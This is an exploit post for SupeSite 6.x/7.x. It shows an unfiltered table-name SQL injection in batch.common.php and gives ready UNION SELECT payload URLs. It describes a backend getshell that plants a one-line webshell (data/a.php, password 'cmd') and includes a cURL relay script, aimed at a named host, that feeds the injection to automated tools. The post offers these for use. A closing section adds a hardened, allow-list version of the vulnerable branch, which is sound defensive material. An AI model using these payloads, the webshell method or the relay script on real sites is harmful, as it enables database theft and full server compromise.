SupeSite universal SQL injection and backend getshell

Tested on 6.x and 7.x; other versions were not tested, so try them yourselves.

[php]
batch.common.php (218) :
} elseif ($action == 'modelquote') { // quote a model comment
    $name = empty($_GET['name'])?'':trim($_GET['name']); // no filtering
    $cid = empty($_GET['cid'])?0:intval($_GET['cid']);
    $html = false;
    if(!empty($name) && !empty($cid)) {
        $item = array();
        $query = $_SGLOBAL['db']->query('SELECT * FROM '.tname($name.'comments').' WHERE cid=\''.$cid.'\''); // passed through tname, then straight into the query
        if($item = $_SGLOBAL['db']->fetch_array($query)) {
            $item['message'] = preg_replace("//is", '',$item['message']);
            $html = '[quote]'.$blang['from_the_original_note'].$item['author'].$blang['at'].sgmdate($item['dateline']).$blang['released']."\n".cuthtml($item['message'], 100).'[/quote]';
            showxml($html);
        }
    }
    showxml($html);
}
[/php]

Now let's look at the tname function:

[php]
function/common.func.php (601) :
function tname($name, $mode=0) {
    global $_SC;
    if($mode == 1) {
        return (empty($_SC['dbname_bbs'])?'':'`'.$_SC['dbname_bbs'].'`.').'`'.$_SC['tablepre_bbs'].$name.'`';
    } elseif ($mode == 2) {
        return (empty($_SC['dbname_uch'])?'':'`'.$_SC['dbname_uch'].'`.').'`'.$_SC['tablepre_uch'].$name.'`';
    } else {
        return $_SC['tablepre'].$name;
    }
}
[/php]

Still no filtering: it simply does not care what you pass in, so why wouldn't you inject?

exp: http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments

[sql]
# You can go straight to ORDER BY after this, you know the rest
http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments order by xxx

# The column count differs between versions, so determine it with ORDER BY first. For 7.5 it is 21 columns; here is a 7.5 exp:
http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat(0x7e,user(),0x7e,0x5430304C5320474F21,0x7e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23

# You can also set it up and feed it straight to an injection tool:
http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2
[/sql]

About the SupeSite 7.5 backend GETSHELL: a new way of getting a shell, exactly the same as UCHome's:

http://www.xxx.com/admincp.php?action=usrblocks&blocktype=&op=addblockcode

[php] [/php]

Invoke: http://www.xxx.com/batch.javascript.php?bid=1650 , which generates the one-line webshell a.php under data/, password cmd.

Attached is a relay script:
<?php
set_time_limit(0);
// Injection payload arrives in the "id" parameter and is URL-encoded for the target
$id=$_GET["id"];
$id=str_replace(" ","%20",$id);
$id=str_replace("=","%3D",$id);

$url = "http://blog.0day5.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=$id%23"; // change this to the address you need to submit to

echo $url;

// Fetch the target page with cURL and return the body
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
Then just point your tool at it and run.
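The root cause above is that the `name` parameter reaches tname() and the query untouched, so anything after the table name (a space, `where`, `union`, `#`) is executed as SQL. Below is an added example of how the modelquote branch could be hardened; it is not SupeSite's own code. It assumes tname(), showxml(), cuthtml() and $_SGLOBAL['db'] behave as shown on the page, and the allow-list of model names is a hypothetical illustration:

```php
<?php
// Added example, not SupeSite's own code: a hardened version of the
// modelquote branch. Assumes tname(), showxml(), cuthtml() and
// $_SGLOBAL['db'] behave as on the page; the allow-list is hypothetical.

// Only these model names may be turned into a "<model>comments" table.
const MODELQUOTE_MODELS = ['space', 'news', 'blog'];

// Return the validated model name, or null when the input is not acceptable.
// The pattern rejects spaces, quotes, '#' and anything else SQL could parse;
// the allow-list then rejects well-formed but unknown table names.
function modelquote_model(string $raw): ?string
{
    $name = trim($raw);
    if (!preg_match('/^[a-z][a-z0-9_]{0,31}$/', $name)) {
        return null;
    }
    return in_array($name, MODELQUOTE_MODELS, true) ? $name : null;
}

// Build the SQL text only from validated parts. cid is cast to int and
// embedded unquoted, so there is no string context to break out of.
function modelquote_sql(string $rawName, $rawCid): ?string
{
    $model = modelquote_model($rawName);
    $cid   = (int) $rawCid;
    if ($model === null || $cid <= 0) {
        return null;
    }
    return 'SELECT * FROM ' . tname($model . 'comments') . ' WHERE cid=' . $cid;
}

// Request handler: refuses bad input instead of running an unvalidated query.
function modelquote_handler(): void
{
    global $_SGLOBAL;
    $sql = modelquote_sql($_GET['name'] ?? '', $_GET['cid'] ?? 0);
    if ($sql === null) {
        showxml(false);   // same empty response the original gives on bad input
        return;
    }
    $html  = false;
    $query = $_SGLOBAL['db']->query($sql);
    if ($item = $_SGLOBAL['db']->fetch_array($query)) {
        $html = '[quote]' . cuthtml($item['message'], 100) . '[/quote]';
    }
    showxml($html);
}
```

With this in place the request shown earlier, `name=spacecomments where 1=2 union select ...`, fails the identifier pattern at the first space and never reaches tname(); a legitimate `name=space` still resolves to the `spacecomments` table. Validating the identifier before concatenation is the essential step, since table names cannot be bound as prepared-statement parameters.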
